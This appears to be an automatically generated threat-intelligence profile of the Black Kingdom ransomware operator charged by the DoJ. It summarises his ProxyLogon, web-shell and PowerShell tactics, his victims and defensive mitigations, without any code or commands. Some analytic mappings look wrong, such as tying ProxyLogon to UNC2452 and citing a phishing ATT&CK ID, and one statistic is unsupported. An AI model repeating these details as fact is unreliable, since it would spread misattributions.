Full Report
The U.S. Department of Justice (DoJ) on Thursday announced charges against a 36-year-old Yemeni national for allegedly deploying the Black Kingdom ransomware against global targets, including businesses, schools, and hospitals in the United States. Rami Khaled Ahmed of Sana'a, Yemen, has been charged with one count of conspiracy, one count of intentional damage to a protected computer, and one
Analysis Summary
# Threat Actor: Rami Khaled Ahmed / Black Kingdom Ransomware Operator
## Attribution & Identity
* **Attribution:** A 36-year-old Yemeni national named Rami Khaled Ahmed, residing in Sana'a, Yemen.
* **Known Aliases:** Associated with the ransomware strain tracked as **Black Kingdom**. The ransomware family is also tracked under the name **Pydomer**. The actor's activity bears hallmarks of a "motivated script-kiddie."
## Activity Summary
* **Campaign Timeline:** Activity spanning from March 2021 to June 2023.
* **Operations:** Ahmed is charged with deploying the Black Kingdom ransomware against global targets, encrypting data or threatening to steal data, demanding \$10,000 USD in Bitcoin. A co-conspirator handled the cryptocurrency address.
* **Recent Charges:** U.S. Department of Justice (DoJ) announced federal charges against Ahmed for conspiracy, intentional damage to a protected computer, and threatening damage to a protected computer.
* **Related Activity:** Black Kingdom was previously observed exploiting Pulse Secure VPN vulnerabilities ([CVE-2019-11510]). Later, a Nigerian threat actor was observed attempting to recruit insiders to deploy Black Kingdom for a \$1 million reward.
## Tactics, Techniques & Procedures
* **Initial Access:** Exploiting vulnerabilities in **Microsoft Exchange Server known as ProxyLogon** to gain initial access.
* **Post-Exploitation:** Leveraging ProxyLogon exploitation to deploy **web shells**.
* **Execution:** Using web shells to issue **PowerShell commands** to download and execute the ransomware payload.
* **Impact:** Data encryption or data exfiltration/theft, followed by dropping a ransom note instructing payment to a specific Bitcoin address.
* **TTP List:**
* Exploiting ProxyLogon (UNC2452/HAFNIUM) vulnerabilities.
* Deploying web shells.
* Leveraging PowerShell for payload download.
* Ransomware deployment (Black Kingdom/Pydomer).
* Extortion via Bitcoin payment demands.
* **MITRE ATT&CK IDs:** Not explicitly provided in the text, but exploitation of Exchange Server vulnerability aligns with Initial Access techniques (e.g., T1190, T1566.001). Using PowerShell aligns with Execution (T1059.001).
## Targeting
* **Sectors:** Businesses, schools, and hospitals. Specific examples include a medical billing services company, a ski resort, a school district, and a health clinic.
* **Geography:** United States (Encino, Oregon, Pennsylvania, Wisconsin) and "elsewhere."
* **Victims:** Estimated delivery on approximately 1,500 computer systems globally.
## Tools & Infrastructure
* **Malware Families Used:** Black Kingdom ransomware (also known as Pydomer).
* **Infrastructure:**
* Black Kingdom email address used for contact post-payment.
* Cryptocurrency address for receiving \$10,000 in Bitcoin.
* **Defanged Information:** (None explicitly mentioned other than the nature of the payment mechanisms.)
## Implications
The prosecution of Rami Khaled Ahmed demonstrates continued international law enforcement focus on holding individual actors behind disruptive ransomware campaigns accountable. The Black Kingdom ransomware itself is described as relatively "rudimentary and amateurish," but its success was derived from aggressively weaponizing zero-day/recently patched critical vulnerabilities like ProxyLogon, indicating a high level of threat against organizations slow to patch high-profile flaws.
## Mitigations
* **Vulnerability Management:** Prioritize patching critical vulnerabilities, specifically Microsoft Exchange Server vulnerabilities (ProxyLogon), immediately upon disclosure or exploitation.
* **Defensive Posture:** Implement robust email gateway protections and endpoint detection capabilities to prevent web shell deployment and PowerShell misuse stemming from initial exploitation chains.
* **Incident Response:** Maintain clear procedures for handling ransomware demands; note that 64% of victim organizations listed in aggregate reporting chose not to pay the ransom.